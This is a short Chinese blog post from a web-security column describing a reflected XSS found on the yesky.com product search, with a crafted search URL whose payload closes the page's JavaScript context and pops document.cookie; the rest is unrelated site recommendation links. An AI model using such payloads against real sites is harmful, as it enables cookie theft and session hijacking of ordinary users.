成功了一次

最新推荐文章于 2024-05-02 18:12:22 发布
最新推荐文章于 2024-05-02 18:12:22 发布
阅读量197 收藏
点赞数
分类专栏: web安全 文章标签: javascript ViewUI
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baowang666666/article/details/84460990
版权

那个web页面中的编码真蛋疼,今天看了一个分响不错,测试后是成功的,天极网,现在还存在xss漏洞,本来他自身就存在漏洞,但是因为浏览器存在xss过滤器,所以我们无法成功攻入,但是老毛说过 特殊情况特殊分析,

//window.location.href = "/searchproduct.action?wd="
 // + '你妈的' + "&pageNo=" + num2+ "&smallCatalogid=" + ''+ "&brandId=" + '';
 document.forms[0].pageNo.value = num2;
 document.forms[0].submit(); 


我们要先发现输入点和输出点,才能准确的找到如何进行入侵,在查看源码中找到你的输出点后,发现有一段是存在于JavaScript代码中的,其他的不太好滤过过滤器,

我们构造如下的url请求,

http://search.yesky.com/searchproduct.do?wd=%0a%0d}alert(document.cookie);{'

js还是比较严格的,最后不家那个‘和后面的’闭合无法执行alert的函数,如此成功弹出了本地的cookie

 

 

 

 

 

 

 

 

 

 

baowang666666
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
连接nginx总是请求成功一次失败一次
star950117的博客
09-17 7814
在开发中使用nginx作为反向代理请求,发现请求总是成功一次失败一次,查看nginx错误日志发现: 174 upstream timed out (10060: A connection attempt failed because the connected party did not properly respond after a period of time 然后根据网上资料发现,只...
奇怪的http接口,客户端请求一次成功,下一次就挂起
maximiliansheng的专栏
02-17 4481
有个http的服务端接口,用网页上ajax的方式请求此接口时,总是第一次正常返回200,第二次再请求时就pending。服务端是用lua开发的skynet框架运行的服务,服务类本身没什么特别,跟语言和框架没什么关系。无论客户端怎么写请求代码,都是一次好一次挂起的间隔出现。用专门的接口测试工具apifox测试,也是相同的一次好一次挂起。但是用项目自带的一个管理系统请求相同接口就次次正常,此管理系统是用nodejs写的,代码里是调用一个三方的request库来请求http接口。 问题解决:在服务端代码里添加r
vue请求接口有时候404_解决vue请求接口第一次成功,第二次失败问题
weixin_39993623的博客
12-20 4395
使用vue去请求接口发现问题来了:我请求只能请求一次,然后在按按钮去请求的时候发现502(这个是接口定义的)502就是传了空的值过来 这个是其中一种情况,还有别的情况 你看了 大可试试我这样的办法然后发现我前端代码没有问题,接口代码也没有问题data() {return {form: {old_password: '',new_password: '',confirm_password: ''}}...
springcloud配置的服务请求,一次正确一次错误是哪里问题
What are you looking for now
06-07 3284
springcloud配置了eureka注册中心,会把每个服务注册在服务中心里面,每个服务有服务名,注册中心会自动实现负载均衡,也就是多端口号的同名服务,如果出现请求一次正确一次错误,说明服务有的对有的不对,同端口号的服务肯定是对的,那么就是说,有的服务同名了,查看下这个服务对应的服务名有没有重复的,就是application.properties或者application.yml配置文件里的服务...
微信小程序获取手机号第一次失败,第二次成功的解决方案
qq_36457584的博客
06-23 3955
根据官方文档说明 在回调中调用wx.login 可能会刷新登录态,那么wx.login就放在获取手机号前面, 在onload时就可以先wx.login 获取code,然后调用第三方接口获取 session_key,openid,unionid, 在获取手机号回调中,通过wx.checksesstion检测session是否过期,如果没有过期,去调用接口获取手机号即可;如果过期,那么重新去wx.login获取code。 项目例子,具体代码根据项目来: 1先wx.login:拿到code, 到后台
我的一次成功的谈判经历.doc
01-05
我的一次成功的谈判经历
PCI-e合规一次成功全攻略-综合文档
05-25
PCI-e合规一次成功全攻略
解决vue请求接口第一次成功,第二次失败问题
01-19
我请求只能请求一次,然后在按按钮去请求的时候发现 502(这个是接口定义的)502就是传了空的值过来 这个是其中一种情况,还有别的情况 你看了 大可试试我这样的办法 然后发现我前端代码没有问题,接口代码也没有...
一次成功的事件营销
12-17
一次成功的事件营销可能不会让你取代另一个成功者,但一次成功的事件营销却可以给你带来新的生命力和创造...该文档为一次成功的事件营销,是一份很不错的参考资料,具有较高参考价值,感兴趣的可以下载看看
报表控件Stimulsoft在JavaScript报告工具中的事件:查看器事件(上)
励志做最业余的专业博主,控件产品可以私我~
04-28 863
在本文中,我们为JS报告工具中的查看器事件提供了全面的指南,包括它们的详细描述、参数列表等一系列详细内容。
bpmn-js推荐几款常用的插件
飞云先生
04-30 116
bpmn-js整体框架库的风格是以组件的方式进行实现的,这样的结构也更加便于我们更好的对其进行功能扩展,以及客制化功能实现。其实bpmn.io已经为我们实现了较多场景的组件的实现,了解对应组件的功能更能便于我们区分是否需要自己实现,降低重复造轮子的行为,提高开发效率,本篇文章主要是介绍常见的bpmn-js中使用的组件库。
基于React实现B站评论区
最新发布
stu_kk的博客
05-02 898
使用React构建了一个仿照B站基本的前端评论系统,实现了动态加载、排序、添加和删除评论的基本功能。通过React的状态管理和事件处理机制,实现了交互式的用户体验。但是在实际应用中,还需考虑与后端接口的交互、错误处理、分页加载、以及更复杂的用户交互逻辑。
《ElementUI 基础知识》el-tabs header 监听鼠标中键滚动时左右滑动(ElementPlus同样适用)
前端技术
04-29 965
监听 el-tabs 头在鼠标 hover 时。滑动鼠标中键,可左右滑动!
表格隔行变色
weixin_54339833的博客
05-02 374
2.$(document).ready() 是 jQuery 中的一个函数,它确保在文档结构(DOM)加载完成后执行指定的代码。与原生 JavaScript 的 window.onload 不同,$(document).ready() 会在 HTML 文档结构被加载和解析完成后立即执行,而无需等待样式表、图片和子框架的完成加载。if (index % 2 === 0) { // 偶数行。if (i % 2 === 0) { // 偶数行。// 可以省略,因为默认背景色通常是白色。
echarts+百度地图如何定义边界线
abc8002117034的博客
04-30 304
5.setOption里面的参数option.series是echarts散点图的配置项,option.bmap是百度地图的配置项,比如center是当前地图的中心点,zoom是缩放数值,roam是是否可以缩放,mapStyle是地图的样式。3.方法getCenterPoint是获取当前区域中心点的经纬度,我们将会在区域的中心点显示区域名称和具体数值。4.方法convertData返回的是地图上红色散点里面的数据,是对idata的数据格式做的一层转换。2.变量styleJson是地图的样式,可以去。
redux快速入门
qq_73270720的博客
04-29 338
简单的加减案例,学会redux快速入门
js执行顺序
weixin_45392204的博客
04-29 343
同步任务:指的是在主线程上排队执行的任务,只有当前一个任务执行完毕,才能执行下一个任务(按照顺序执行)异步任务:指的是不进入主线程上的任务,进入任务队列的任务,只有当任务队列通知主线程某个异步任务可以执行,方可进入主线程进行执行。异步任务又分宏任务跟微任务宏任务:异步ajax请求、setTimeout、setInterval、文件操作、其他微任务:Promise.then、.catch 和.finally,process.nextTick、其他。
react核心知识
qq_16546829的博客
04-29 700
Fiber架构中处理副作用(side effects)时采用自下而上的方式,这是为了实现更高效的调度和渲染过程,以及更好地支持优先级调度和中断。在Fiber架构中,每个React组件都可以被视为一个fiber节点,这些节点以树状结构组织,形成了React组件树。在渲染过程中,React会遍历整个组件树,并根据需要执行各种操作,比如计算Virtual DOM、处理更新、执行副作用等。异步调度和优先级:自下而上的处理副作用可以更好地支持React的异步调度和优先级调度。
vue项目的执行顺序,以及路由的使用方法
哎 你看的博客
05-01 512
vue项目的执行顺序、Vue Router、
vue 你遇到过接口一次成功一次失败的情况吗
08-31
是的,我在使用Vue时曾遇到过接口一次成功一次失败的情况。 这种情况通常出现在网络不稳定或服务器响应较慢的情况下。当我发送请求到接口时,有时候会立即成功返回数据,而有时候则会出现网络超时或者服务器未响应...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值